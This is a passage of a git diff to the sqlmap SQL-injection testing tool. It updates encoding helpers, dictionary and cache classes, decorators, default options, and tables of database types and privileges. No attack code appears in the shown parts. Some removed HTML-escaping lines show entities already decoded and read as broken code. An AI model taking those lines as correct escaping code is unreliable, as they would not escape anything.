htmlUnescape('foobar') == 'foobar' + True + >>> htmlUnescape('foobar') == 'foobar' + True + >>> htmlUnescape('©€') == htmlUnescape('©€') + True + """ + + if value and isinstance(value, six.string_types): + if six.PY3: + import html + return html.unescape(value) + else: + return html_parser.HTMLParser().unescape(value) + return value + +def singleTimeWarnMessage(message): # Cross-referenced function + sys.stdout.write(message) + sys.stdout.write("\n") + sys.stdout.flush() + +def filterNone(values): # Cross-referenced function + return [_ for _ in values if _] if isinstance(values, _collections.Iterable) else values + +def isListLike(value): # Cross-referenced function + return isinstance(value, (list, tuple, set, BigArray)) + +def shellExec(cmd): # Cross-referenced function + raise NotImplementedError -def hexencode(value): - return utf8encode(value).encode("hex") +def jsonize(data): + """ + Returns JSON serialized data -def unicodeencode(value, encoding=None): + >>> jsonize({'foo':'bar'}) + '{\\n "foo": "bar"\\n}' """ - Return 8-bit string representation of the supplied unicode value: - >>> unicodeencode(u'test') - 'test' + return json.dumps(data, sort_keys=False, indent=4) + +def dejsonize(data): + """ + Returns JSON deserialized data + + >>> dejsonize('{\\n "foo": "bar"\\n}') == {u'foo': u'bar'} + True + """ + + return json.loads(data) + +def decodeHex(value, binary=True): + """ + Returns a decoded representation of the provided hexadecimal value + + >>> decodeHex("313233") == b"123" + True + >>> decodeHex("313233", binary=False) == u"123" + True """ retVal = value - if isinstance(value, unicode): - try: - retVal = value.encode(encoding or UNICODE_ENCODING) - except UnicodeEncodeError: - retVal = value.encode(UNICODE_ENCODING, "replace") + + if isinstance(value, six.binary_type): + value = getText(value) + + if value.lower().startswith("0x"): + value = value[2:] + + try: + retVal = codecs.decode(value, "hex") + except LookupError: + retVal = binascii.unhexlify(value) + + if not binary: + retVal = getText(retVal) + return retVal -def utf8encode(value): - return unicodeencode(value, "utf-8") +def encodeHex(value, binary=True): + """ + Returns an encoded representation of the provided value -def utf8decode(value): - return value.decode("utf-8") + >>> encodeHex(b"123") == b"313233" + True + >>> encodeHex("123", binary=False) + '313233' + >>> encodeHex(b"123"[0]) == b"31" + True + >>> encodeHex(123, binary=False) + '7b' + """ -def htmlescape(value): - codes = (('&', '&'), ('<', '<'), ('>', '>'), ('"', '"'), ("'", '''), (' ', ' ')) - return reduce(lambda x, y: x.replace(y[0], y[1]), codes, value) + if isinstance(value, int): + value = six.int2byte(value) + + if isinstance(value, six.text_type): + value = value.encode(UNICODE_ENCODING) + + try: + retVal = codecs.encode(value, "hex") + except LookupError: + retVal = binascii.hexlify(value) + + if not binary: + retVal = getText(retVal) -def htmlunescape(value): - retVal = value - if value and isinstance(value, basestring): - codes = (('<', '<'), ('>', '>'), ('"', '"'), (' ', ' '), ('&', '&')) - retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal) return retVal -def singleTimeWarnMessage(message): # Cross-linked function - pass +def decodeBase64(value, binary=True, encoding=None): + """ + Returns a decoded representation of provided Base64 value -def stdoutencode(data): - retVal = None + >>> decodeBase64("MTIz") == b"123" + True + >>> decodeBase64("MTIz", binary=False) + '123' + >>> decodeBase64("A-B_CDE") == decodeBase64("A+B/CDE") 
+ True + >>> decodeBase64(b"MTIzNA") == b"1234" + True + >>> decodeBase64("MTIzNA") == b"1234" + True + >>> decodeBase64("MTIzNA==") == b"1234" + True + """ + + if value is None: + return None + + padding = b'=' if isinstance(value, bytes) else '=' + + # Reference: https://stackoverflow.com/a/49459036 + if not value.endswith(padding): + value += 3 * padding + + # Reference: https://en.wikipedia.org/wiki/Base64#URL_applications + # Reference: https://perldoc.perl.org/MIME/Base64.html + if isinstance(value, bytes): + value = value.replace(b'-', b'+').replace(b'_', b'/') + else: + value = value.replace('-', '+').replace('_', '/') + + retVal = base64.b64decode(value) + + if not binary: + retVal = getText(retVal, encoding) + + return retVal + +def encodeBase64(value, binary=True, encoding=None, padding=True, safe=False): + """ + Returns a Base64 encoded representation of the provided value + + >>> encodeBase64(b"123") == b"MTIz" + True + >>> encodeBase64(u"1234", binary=False) + 'MTIzNA==' + >>> encodeBase64(u"1234", binary=False, padding=False) + 'MTIzNA' + >>> encodeBase64(decodeBase64("A-B_CDE"), binary=False, safe=True) + 'A-B_CDE' + """ + + if value is None: + return None + + if isinstance(value, six.text_type): + value = value.encode(encoding or UNICODE_ENCODING) + + retVal = base64.b64encode(value) + + if not binary: + retVal = getText(retVal, encoding) + + if safe: + padding = False + + # Reference: https://en.wikipedia.org/wiki/Base64#URL_applications + # Reference: https://perldoc.perl.org/MIME/Base64.html + if isinstance(retVal, bytes): + retVal = retVal.replace(b'+', b'-').replace(b'/', b'_') + else: + retVal = retVal.replace('+', '-').replace('/', '_') + + if not padding: + retVal = retVal.rstrip(b'=' if isinstance(retVal, bytes) else '=') + + return retVal + +def getBytes(value, encoding=None, errors="strict", unsafe=True): + """ + Returns byte representation of provided Unicode value + + >>> getBytes(u"foo\\\\x01\\\\x83\\\\xffbar") == b"foo\\x01\\x83\\xffbar" + True + """ + + retVal = value + + if encoding is None: + encoding = conf.get("encoding") or UNICODE_ENCODING try: - # Reference: http://bugs.python.org/issue1602 - if IS_WIN: - output = data.encode('ascii', "replace") - - if output != data: - warnMsg = "cannot properly display Unicode characters " - warnMsg += "inside Windows OS command prompt " - warnMsg += "(http://bugs.python.org/issue1602). All " - warnMsg += "unhandled occurances will result in " - warnMsg += "replacement with '?' character. Please, find " - warnMsg += "proper character representation inside " - warnMsg += "corresponding output files. 
" - singleTimeWarnMessage(warnMsg) - - retVal = output + codecs.lookup(encoding) + except (LookupError, TypeError): + encoding = UNICODE_ENCODING + + if isinstance(value, bytearray): + return bytes(value) + elif isinstance(value, memoryview): + return value.tobytes() + elif isinstance(value, six.text_type): + if INVALID_UNICODE_PRIVATE_AREA: + if unsafe: + for char in xrange(0xF0000, 0xF00FF + 1): + value = value.replace(_unichr(char), "%s%02x" % (SAFE_HEX_MARKER, char - 0xF0000)) + + retVal = value.encode(encoding, errors) + + if unsafe: + retVal = re.sub((r"%s([0-9a-f]{2})" % SAFE_HEX_MARKER).encode(), lambda _: decodeHex(_.group(1)), retVal) else: - retVal = data.encode(sys.stdout.encoding) - except: - retVal = data.encode(UNICODE_ENCODING) + try: + retVal = value.encode(encoding, errors) + except UnicodeError: + retVal = value.encode(UNICODE_ENCODING, errors="replace") + + if unsafe: + retVal = re.sub(b"\\\\x([0-9a-f]{2})", lambda _: decodeHex(_.group(1)), retVal) return retVal -def jsonize(data): - return json.dumps(data, sort_keys=False, indent=4) +def getOrds(value): + """ + Returns ORD(...) representation of provided string value -def dejsonize(data): - return json.loads(data) + >>> getOrds(u'fo\\xf6bar') + [102, 111, 246, 98, 97, 114] + >>> getOrds(b"fo\\xc3\\xb6bar") + [102, 111, 195, 182, 98, 97, 114] + """ + + return [_ if isinstance(_, int) else ord(_) for _ in value] + +def getUnicode(value, encoding=None, noneToNull=False): + """ + Returns the unicode representation of the supplied value + + >>> getUnicode('test') == u'test' + True + >>> getUnicode(1) == u'1' + True + >>> getUnicode(None) == 'None' + True + >>> getUnicode(b'/etc/passwd') == '/etc/passwd' + True + """ + + # Best position for --time-limit mechanism + if conf.get("timeLimit") and kb.get("startTime") and (time.time() - kb.startTime > conf.timeLimit): + raise SystemExit + + if noneToNull and value is None: + return NULL + + if isinstance(value, six.text_type): + return value + elif isinstance(value, six.binary_type): + # Heuristics (if encoding not explicitly specified) + candidates = filterNone((encoding, kb.get("pageEncoding") if kb.get("originalPage") else None, conf.get("encoding"), UNICODE_ENCODING, sys.getfilesystemencoding())) + if all(_ in value for _ in (b'<', b'>')): + pass + elif b'\n' not in value and re.search(r"(?i)\w+\.\w{2,3}\Z|\A(\w:\\|/\w+)", six.text_type(value, UNICODE_ENCODING, errors="ignore")): + candidates = filterNone((encoding, sys.getfilesystemencoding(), kb.get("pageEncoding") if kb.get("originalPage") else None, UNICODE_ENCODING, conf.get("encoding"))) + elif conf.get("encoding") and b'\n' not in value: + candidates = filterNone((encoding, conf.get("encoding"), kb.get("pageEncoding") if kb.get("originalPage") else None, sys.getfilesystemencoding(), UNICODE_ENCODING)) + + for candidate in candidates: + try: + return six.text_type(value, candidate) + except (UnicodeDecodeError, LookupError): + pass + + try: + return six.text_type(value, encoding or (kb.get("pageEncoding") if kb.get("originalPage") else None) or UNICODE_ENCODING) + except UnicodeDecodeError: + return six.text_type(value, UNICODE_ENCODING, errors="reversible") + elif isListLike(value): + value = list(getUnicode(_, encoding, noneToNull) for _ in value) + return value + else: + try: + return six.text_type(value) + except UnicodeDecodeError: + return six.text_type(str(value), errors="ignore") # encoding ignored for non-basestring instances + +def getText(value, encoding=None): + """ + Returns textual value of a given value 
(Note: not necessary Unicode on Python2) + + >>> getText(b"foobar") + 'foobar' + >>> isinstance(getText(u"fo\\u2299bar"), six.text_type) + True + """ + + retVal = value + + if isinstance(value, six.binary_type): + retVal = getUnicode(value, encoding) + + if six.PY2: + try: + retVal = str(retVal) + except: + pass + + return retVal + +def stdoutEncode(value): + """ + Returns textual representation of a given value safe for writing to stdout + >>> stdoutEncode(b"foobar") + 'foobar' + """ + + if value is None: + value = "" + + if IS_WIN and IS_TTY and kb.get("codePage", -1) is None: + output = shellExec("chcp") + match = re.search(r": (\d{3,})", output or "") + + if match: + try: + candidate = "cp%s" % match.group(1) + codecs.lookup(candidate) + kb.codePage = candidate + except (LookupError, TypeError): + pass + + kb.codePage = kb.codePage or "" + + encoding = kb.get("codePage") or getattr(sys.stdout, "encoding", None) or UNICODE_ENCODING + + if six.PY3: + if isinstance(value, (bytes, bytearray)): + value = getUnicode(value, encoding) + elif not isinstance(value, str): + value = str(value) + + try: + retVal = value.encode(encoding, errors="replace").decode(encoding, errors="replace") + except (LookupError, TypeError): + retVal = value.encode("ascii", errors="replace").decode("ascii", errors="replace") + else: + if isinstance(value, six.text_type): + try: + retVal = value.encode(encoding, errors="replace") + except (LookupError, TypeError): + retVal = value.encode("ascii", errors="replace") + else: + retVal = value + + return retVal + +def getConsoleLength(value): + """ + Returns console width of unicode values + + >>> getConsoleLength("abc") + 3 + >>> getConsoleLength(u"\\u957f\\u6c5f") + 4 + """ + + if isinstance(value, six.text_type): + retVal = len(value) + sum(ord(_) >= 0x3000 for _ in value) + else: + retVal = len(value) + + return retVal diff --git a/lib/core/data.py b/lib/core/data.py index dcc3fc020fe..5523a60c49a 100644 --- a/lib/core/data.py +++ b/lib/core/data.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.datatype import AttribDict @@ -14,6 +14,9 @@ # object to store original command line options cmdLineOptions = AttribDict() +# object to store merged options (command line, configuration file and default options) +mergedOptions = AttribDict() + # object to share within function and classes command # line options and settings conf = AttribDict() diff --git a/lib/core/datatype.py b/lib/core/datatype.py index b5f4176a686..b0b1809f8a8 100644 --- a/lib/core/datatype.py +++ b/lib/core/datatype.py @@ -1,33 +1,37 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import copy +import threading import types -from lib.core.exception import SqlmapDataException +from thirdparty.odict import OrderedDict +from thirdparty.six.moves import collections_abc as _collections class AttribDict(dict): """ - This class defines the sqlmap object, inheriting from Python data - type dictionary. 
+ This class defines the dictionary with added capability to access members as attributes + + >>> foo = AttribDict() + >>> foo.bar = 1 + >>> foo.bar + 1 + >>> import copy; copy.deepcopy(foo).bar + 1 """ - def __init__(self, indict=None, attribute=None): + def __init__(self, indict=None, attribute=None, keycheck=True): if indict is None: indict = {} - # Set any attributes here - before initialisation - # these remain as normal attributes - self.attribute = attribute dict.__init__(self, indict) - self.__initialised = True - - # After initialisation, setting attributes - # is the same as setting an item + self.__dict__["_attribute"] = attribute + self.__dict__["_keycheck"] = keycheck + self.__dict__["_initialized"] = True def __getattr__(self, item): """ @@ -38,7 +42,23 @@ def __getattr__(self, item): try: return self.__getitem__(item) except KeyError: - raise SqlmapDataException("unable to access item '%s'" % item) + if self.__dict__.get("_keycheck"): + raise AttributeError("unable to access item '%s'" % item) + else: + return None + + def __delattr__(self, item): + """ + Deletes attributes + """ + + try: + return self.pop(item) + except KeyError: + if self.__dict__.get("_keycheck"): + raise AttributeError("unable to access item '%s'" % item) + else: + return None def __setattr__(self, item, value): """ @@ -46,14 +66,8 @@ def __setattr__(self, item, value): Only if we are initialised """ - # This test allows attributes to be set in the __init__ method - if "_AttribDict__initialised" not in self.__dict__: - return dict.__setattr__(self, item, value) - - # Any normal attributes are handled normally - elif item in self.__dict__: - dict.__setattr__(self, item, value) - + if "_initialized" not in self.__dict__ or item in self.__dict__: + self.__dict__[item] = value else: self.__setitem__(item, value) @@ -64,14 +78,12 @@ def __setstate__(self, dict): self.__dict__ = dict def __deepcopy__(self, memo): - retVal = self.__class__() + retVal = self.__class__(keycheck=self.__dict__.get("_keycheck")) memo[id(self)] = retVal - for attr in dir(self): - if not attr.startswith('_'): - value = getattr(self, attr) - if not isinstance(value, (types.BuiltinFunctionType, types.BuiltinFunctionType, types.FunctionType, types.MethodType)): - setattr(retVal, attr, copy.deepcopy(value, memo)) + for attr, value in self.__dict__.items(): + if attr not in ('_attribute', '_keycheck', '_initialized'): + setattr(retVal, attr, copy.deepcopy(value, memo)) for key, value in self.items(): retVal.__setitem__(key, copy.deepcopy(value, memo)) @@ -79,8 +91,8 @@ def __deepcopy__(self, memo): return retVal class InjectionDict(AttribDict): - def __init__(self): - AttribDict.__init__(self) + def __init__(self, **kwargs): + AttribDict.__init__(self, **kwargs) self.place = None self.parameter = None @@ -88,6 +100,7 @@ def __init__(self): self.prefix = None self.suffix = None self.clause = None + self.notes = [] # Note: https://github.com/sqlmapproject/sqlmap/issues/1888 # data is a dict with various stype, each which is a dict with # all the information specific for that stype @@ -100,3 +113,129 @@ def __init__(self): self.dbms = None self.dbms_version = None self.os = None + +# Reference: https://www.kunxi.org/2014/05/lru-cache-in-python +class LRUDict(object): + """ + This class defines the LRU dictionary + + >>> foo = LRUDict(capacity=2) + >>> foo["first"] = 1 + >>> foo["second"] = 2 + >>> foo["third"] = 3 + >>> "first" in foo + False + >>> "third" in foo + True + """ + + def __init__(self, capacity): + self.capacity = capacity + 
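# Note: the OrderedDict below keeps keys in insertion order; reads
+        # re-insert the accessed key (see __getitem__), so its first entry is
+        # always the least recently used one and popitem(last=False) in
+        # __setitem__ evicts it once the capacity is reached
+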
self.cache = OrderedDict() + self.__lock = threading.Lock() + + def __len__(self): + return len(self.cache) + + def __contains__(self, key): + return key in self.cache + + def __getitem__(self, key): + with self.__lock: + value = self.cache.pop(key) + self.cache[key] = value + return value + + def get(self, key, default=None): + try: + return self.__getitem__(key) + except: + return default + + def __setitem__(self, key, value): + with self.__lock: + try: + self.cache.pop(key) + except KeyError: + if len(self.cache) >= self.capacity: + self.cache.popitem(last=False) + self.cache[key] = value + + def set(self, key, value): + self.__setitem__(key, value) + + def keys(self): + return self.cache.keys() + +# Reference: https://code.activestate.com/recipes/576694/ +class OrderedSet(_collections.MutableSet): + """ + This class defines the set with ordered (as added) items + + >>> foo = OrderedSet() + >>> foo.add(1) + >>> foo.add(2) + >>> foo.add(3) + >>> foo.pop() + 3 + >>> foo.pop() + 2 + >>> foo.pop() + 1 + """ + + def __init__(self, iterable=None): + self.end = end = [] + end += [None, end, end] # sentinel node for doubly linked list + self.map = {} # key --> [key, prev, next] + if iterable is not None: + self |= iterable + + def __len__(self): + return len(self.map) + + def __contains__(self, key): + return key in self.map + + def add(self, value): + if value not in self.map: + end = self.end + curr = end[1] + curr[2] = end[1] = self.map[value] = [value, curr, end] + + def discard(self, value): + if value in self.map: + value, prev, next = self.map.pop(value) + prev[2] = next + next[1] = prev + + def __iter__(self): + end = self.end + curr = end[2] + while curr is not end: + yield curr[0] + curr = curr[2] + + def __reversed__(self): + end = self.end + curr = end[1] + while curr is not end: + yield curr[0] + curr = curr[1] + + def pop(self, last=True): + if not self: + raise KeyError('set is empty') + key = self.end[1][0] if last else self.end[2][0] + self.discard(key) + return key + + def __repr__(self): + if not self: + return '%s()' % (self.__class__.__name__,) + return '%s(%r)' % (self.__class__.__name__, list(self)) + + def __eq__(self, other): + if isinstance(other, OrderedSet): + return len(self) == len(other) and list(self) == list(other) + return set(self) == set(other) diff --git a/lib/core/decorators.py b/lib/core/decorators.py index fbc19c92a1f..53603e81637 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -1,19 +1,128 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -def cachedmethod(f, cache={}): +import functools +import threading + +from lib.core.datatype import LRUDict +from lib.core.settings import MAX_CACHE_ITEMS +from lib.core.threads import getCurrentThreadData + +_cache = {} +_method_locks = {} + +def cachedmethod(f): """ Method with a cached content + >>> __ = cachedmethod(lambda _: _) + >>> __(1) + 1 + >>> __(1) + 1 + >>> __ = cachedmethod(lambda *args, **kwargs: args[0]) + >>> __(2) + 2 + >>> __ = cachedmethod(lambda *args, **kwargs: next(iter(kwargs.values()))) + >>> __(foobar=3) + 3 + Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/ """ + + _cache[f] = LRUDict(capacity=MAX_CACHE_ITEMS) + _method_locks[f] = threading.RLock() + + def _freeze(val): + if isinstance(val, (list, set, tuple)): + return 
tuple(_freeze(x) for x in val) + if isinstance(val, dict): + return tuple(sorted((k, _freeze(v)) for k, v in val.items())) + return val + + @functools.wraps(f) + def _f(*args, **kwargs): + lock, cache = _method_locks[f], _cache[f] + + try: + if kwargs: + key = (args, frozenset(kwargs.items())) + else: + key = args + + with lock: + if key in cache: + return cache[key] + + except TypeError: + # Note: fallback (slowpath( + if kwargs: + key = (_freeze(args), _freeze(kwargs)) + else: + key = _freeze(args) + + with lock: + if key in cache: + return cache[key] + + result = f(*args, **kwargs) + + with lock: + cache[key] = result + + return result + + return _f + +def stackedmethod(f): + """ + Method using pushValue/popValue functions (fallback function for stack realignment) + + >>> threadData = getCurrentThreadData() + >>> original = len(threadData.valueStack) + >>> __ = stackedmethod(lambda _: threadData.valueStack.append(_)) + >>> __(1) + >>> len(threadData.valueStack) == original + True + """ + + @functools.wraps(f) + def _(*args, **kwargs): + threadData = getCurrentThreadData() + originalLevel = len(threadData.valueStack) + + try: + result = f(*args, **kwargs) + finally: + if len(threadData.valueStack) > originalLevel: + del threadData.valueStack[originalLevel:] + + return result + + return _ + +def lockedmethod(f): + """ + Decorates a function or method with a reentrant lock (only one thread can execute the function at a time) + + >>> @lockedmethod + ... def recursive_count(n): + ... if n <= 0: return 0 + ... return n + recursive_count(n - 1) + >>> recursive_count(5) + 15 + """ + + lock = threading.RLock() + + @functools.wraps(f) def _(*args, **kwargs): - key = (f, tuple(args), frozenset(kwargs.items())) - if key not in cache: - cache[key] = f(*args, **kwargs) - return cache[key] + with lock: + result = f(*args, **kwargs) + return result + return _ diff --git a/lib/core/defaults.py b/lib/core/defaults.py index 17d18c0ef49..743ab6a26b9 100644 --- a/lib/core/defaults.py +++ b/lib/core/defaults.py @@ -1,28 +1,29 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ from lib.core.datatype import AttribDict _defaults = { - "csvDel": ",", - "timeSec": 5, - "googlePage": 1, - "cpuThrottle": 5, - "verbose": 1, - "delay": 0, - "timeout": 30, - "retries": 3, - "saFreq": 0, - "threads": 1, - "level": 1, - "risk": 1, - "dumpFormat": "CSV", - "tech": "BEUSTQ", - "torType": "HTTP", + "csvDel": ',', + "timeSec": 5, + "googlePage": 1, + "verbose": 1, + "delay": 0, + "timeout": 30, + "retries": 3, + "csrfRetries": 0, + "safeFreq": 0, + "threads": 1, + "level": 1, + "risk": 1, + "dumpFormat": "CSV", + "tablePrefix": "sqlmap", + "technique": "BEUSTQ", + "torType": "SOCKS5", } defaults = AttribDict(_defaults) diff --git a/lib/core/dicts.py b/lib/core/dicts.py index 4901d016edc..a1baf0db3a2 100644 --- a/lib/core/dicts.py +++ b/lib/core/dicts.py @@ -1,213 +1,691 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from lib.core.enums import CONTENT_TYPE from lib.core.enums import DBMS +from lib.core.enums import OS from lib.core.enums import POST_HINT +from lib.core.settings import ACCESS_ALIASES +from 
lib.core.settings import ALTIBASE_ALIASES from lib.core.settings import BLANK -from lib.core.settings import NULL +from lib.core.settings import CACHE_ALIASES +from lib.core.settings import CRATEDB_ALIASES +from lib.core.settings import CUBRID_ALIASES +from lib.core.settings import DB2_ALIASES +from lib.core.settings import DERBY_ALIASES +from lib.core.settings import EXTREMEDB_ALIASES +from lib.core.settings import FIREBIRD_ALIASES +from lib.core.settings import FRONTBASE_ALIASES +from lib.core.settings import H2_ALIASES +from lib.core.settings import HSQLDB_ALIASES +from lib.core.settings import INFORMIX_ALIASES +from lib.core.settings import MAXDB_ALIASES +from lib.core.settings import MCKOI_ALIASES +from lib.core.settings import MIMERSQL_ALIASES +from lib.core.settings import MONETDB_ALIASES from lib.core.settings import MSSQL_ALIASES from lib.core.settings import MYSQL_ALIASES -from lib.core.settings import PGSQL_ALIASES +from lib.core.settings import NULL from lib.core.settings import ORACLE_ALIASES +from lib.core.settings import PGSQL_ALIASES +from lib.core.settings import PRESTO_ALIASES +from lib.core.settings import RAIMA_ALIASES from lib.core.settings import SQLITE_ALIASES -from lib.core.settings import ACCESS_ALIASES -from lib.core.settings import FIREBIRD_ALIASES -from lib.core.settings import MAXDB_ALIASES from lib.core.settings import SYBASE_ALIASES -from lib.core.settings import DB2_ALIASES +from lib.core.settings import VERTICA_ALIASES +from lib.core.settings import VIRTUOSO_ALIASES +from lib.core.settings import CLICKHOUSE_ALIASES +from lib.core.settings import SNOWFLAKE_ALIASES FIREBIRD_TYPES = { - "261": "BLOB", - "14": "CHAR", - "40": "CSTRING", - "11": "D_FLOAT", - "27": "DOUBLE", - "10": "FLOAT", - "16": "INT64", - "8": "INTEGER", - "9": "QUAD", - "7": "SMALLINT", - "12": "DATE", - "13": "TIME", - "35": "TIMESTAMP", - "37": "VARCHAR", - } + 261: "BLOB", + 14: "CHAR", + 40: "CSTRING", + 11: "D_FLOAT", + 27: "DOUBLE", + 10: "FLOAT", + 16: "INT64", + 8: "INTEGER", + 9: "QUAD", + 7: "SMALLINT", + 12: "DATE", + 13: "TIME", + 35: "TIMESTAMP", + 37: "VARCHAR", +} + +INFORMIX_TYPES = { + 0: "CHAR", + 1: "SMALLINT", + 2: "INTEGER", + 3: "FLOAT", + 4: "SMALLFLOAT", + 5: "DECIMAL", + 6: "SERIAL", + 7: "DATE", + 8: "MONEY", + 9: "NULL", + 10: "DATETIME", + 11: "BYTE", + 12: "TEXT", + 13: "VARCHAR", + 14: "INTERVAL", + 15: "NCHAR", + 16: "NVARCHAR", + 17: "INT8", + 18: "SERIAL8", + 19: "SET", + 20: "MULTISET", + 21: "LIST", + 22: "ROW (unnamed)", + 23: "COLLECTION", + 40: "Variable-length opaque type", + 41: "Fixed-length opaque type", + 43: "LVARCHAR", + 45: "BOOLEAN", + 52: "BIGINT", + 53: "BIGSERIAL", + 2061: "IDSSECURITYLABEL", + 4118: "ROW (named)", +} SYBASE_TYPES = { - "14": "floatn", - "8": "float", - "15": "datetimn", - "12": "datetime", - "23": "real", - "28": "numericn", - "10": "numeric", - "27": "decimaln", - "26": "decimal", - "17": "moneyn", - "11": "money", - "21": "smallmoney", - "22": "smalldatetime", - "13": "intn", - "7": "int", - "6": "smallint", - "5": "tinyint", - "16": "bit", - "2": "varchar", - "18": "sysname", - "25": "nvarchar", - "1": "char", - "24": "nchar", - "4": "varbinary", - "80": "timestamp", - "3": "binary", - "19": "text", - "20": "image", - } + 14: "floatn", + 8: "float", + 15: "datetimn", + 12: "datetime", + 23: "real", + 28: "numericn", + 10: "numeric", + 27: "decimaln", + 26: "decimal", + 17: "moneyn", + 11: "money", + 21: "smallmoney", + 22: "smalldatetime", + 13: "intn", + 7: "int", + 6: "smallint", + 5: "tinyint", + 16: "bit", + 2: 
"varchar", + 18: "sysname", + 25: "nvarchar", + 1: "char", + 24: "nchar", + 4: "varbinary", + 80: "timestamp", + 3: "binary", + 19: "text", + 20: "image", +} + +ALTIBASE_TYPES = { + 1: "CHAR", + 12: "VARCHAR", + -8: "NCHAR", + -9: "NVARCHAR", + 2: "NUMERIC", + 6: "FLOAT", + 8: "DOUBLE", + 7: "REAL", + -5: "BIGINT", + 4: "INTEGER", + 5: "SMALLINT", + 9: "DATE", + 30: "BLOB", + 40: "CLOB", + 20001: "BYTE", + 20002: "NIBBLE", + -7: "BIT", + -100: "VARBIT", + 10003: "GEOMETRY", +} MYSQL_PRIVS = { - 1: "select_priv", - 2: "insert_priv", - 3: "update_priv", - 4: "delete_priv", - 5: "create_priv", - 6: "drop_priv", - 7: "reload_priv", - 8: "shutdown_priv", - 9: "process_priv", - 10: "file_priv", - 11: "grant_priv", - 12: "references_priv", - 13: "index_priv", - 14: "alter_priv", - 15: "show_db_priv", - 16: "super_priv", - 17: "create_tmp_table_priv", - 18: "lock_tables_priv", - 19: "execute_priv", - 20: "repl_slave_priv", - 21: "repl_client_priv", - 22: "create_view_priv", - 23: "show_view_priv", - 24: "create_routine_priv", - 25: "alter_routine_priv", - 26: "create_user_priv", - } + 1: "select_priv", + 2: "insert_priv", + 3: "update_priv", + 4: "delete_priv", + 5: "create_priv", + 6: "drop_priv", + 7: "reload_priv", + 8: "shutdown_priv", + 9: "process_priv", + 10: "file_priv", + 11: "grant_priv", + 12: "references_priv", + 13: "index_priv", + 14: "alter_priv", + 15: "show_db_priv", + 16: "super_priv", + 17: "create_tmp_table_priv", + 18: "lock_tables_priv", + 19: "execute_priv", + 20: "repl_slave_priv", + 21: "repl_client_priv", + 22: "create_view_priv", + 23: "show_view_priv", + 24: "create_routine_priv", + 25: "alter_routine_priv", + 26: "create_user_priv", +} PGSQL_PRIVS = { - 1: "createdb", - 2: "super", - 3: "catupd", - } + 1: "createdb", + 2: "super", + 3: "replication", +} + +# Reference(s): http://stackoverflow.com/a/17672504 +# http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES FIREBIRD_PRIVS = { - "S": "SELECT", - "I": "INSERT", - "U": "UPDATE", - "D": "DELETE", - "R": "REFERENCES", - "E": "EXECUTE", - } + "S": "SELECT", + "I": "INSERT", + "U": "UPDATE", + "D": "DELETE", + "R": "REFERENCE", + "X": "EXECUTE", + "A": "ALL", + "M": "MEMBER", + "T": "DECRYPT", + "E": "ENCRYPT", + "B": "SUBSCRIBE", +} + +# Reference(s): https://www.ibm.com/support/knowledgecenter/SSGU8G_12.1.0/com.ibm.sqls.doc/ids_sqs_0147.htm +# https://www.ibm.com/support/knowledgecenter/SSGU8G_11.70.0/com.ibm.sqlr.doc/ids_sqr_077.htm + +INFORMIX_PRIVS = { + "D": "DBA (all privileges)", + "R": "RESOURCE (create UDRs, UDTs, permanent tables and indexes)", + "C": "CONNECT (work with existing tables)", + "G": "ROLE", + "U": "DEFAULT (implicit connection)", +} DB2_PRIVS = { - 1: "CONTROLAUTH", - 2: "ALTERAUTH", - 3: "DELETEAUTH", - 4: "INDEXAUTH", - 5: "INSERTAUTH", - 6: "REFAUTH", - 7: "SELECTAUTH", - 8: "UPDATEAUTH", - } + 1: "CONTROLAUTH", + 2: "ALTERAUTH", + 3: "DELETEAUTH", + 4: "INDEXAUTH", + 5: "INSERTAUTH", + 6: "REFAUTH", + 7: "SELECTAUTH", + 8: "UPDATEAUTH", +} DUMP_REPLACEMENTS = {" ": NULL, "": BLANK} DBMS_DICT = { - DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/"), - DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/"), - DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/"), - DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/"), - DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite"), - DBMS.ACCESS: (ACCESS_ALIASES, 
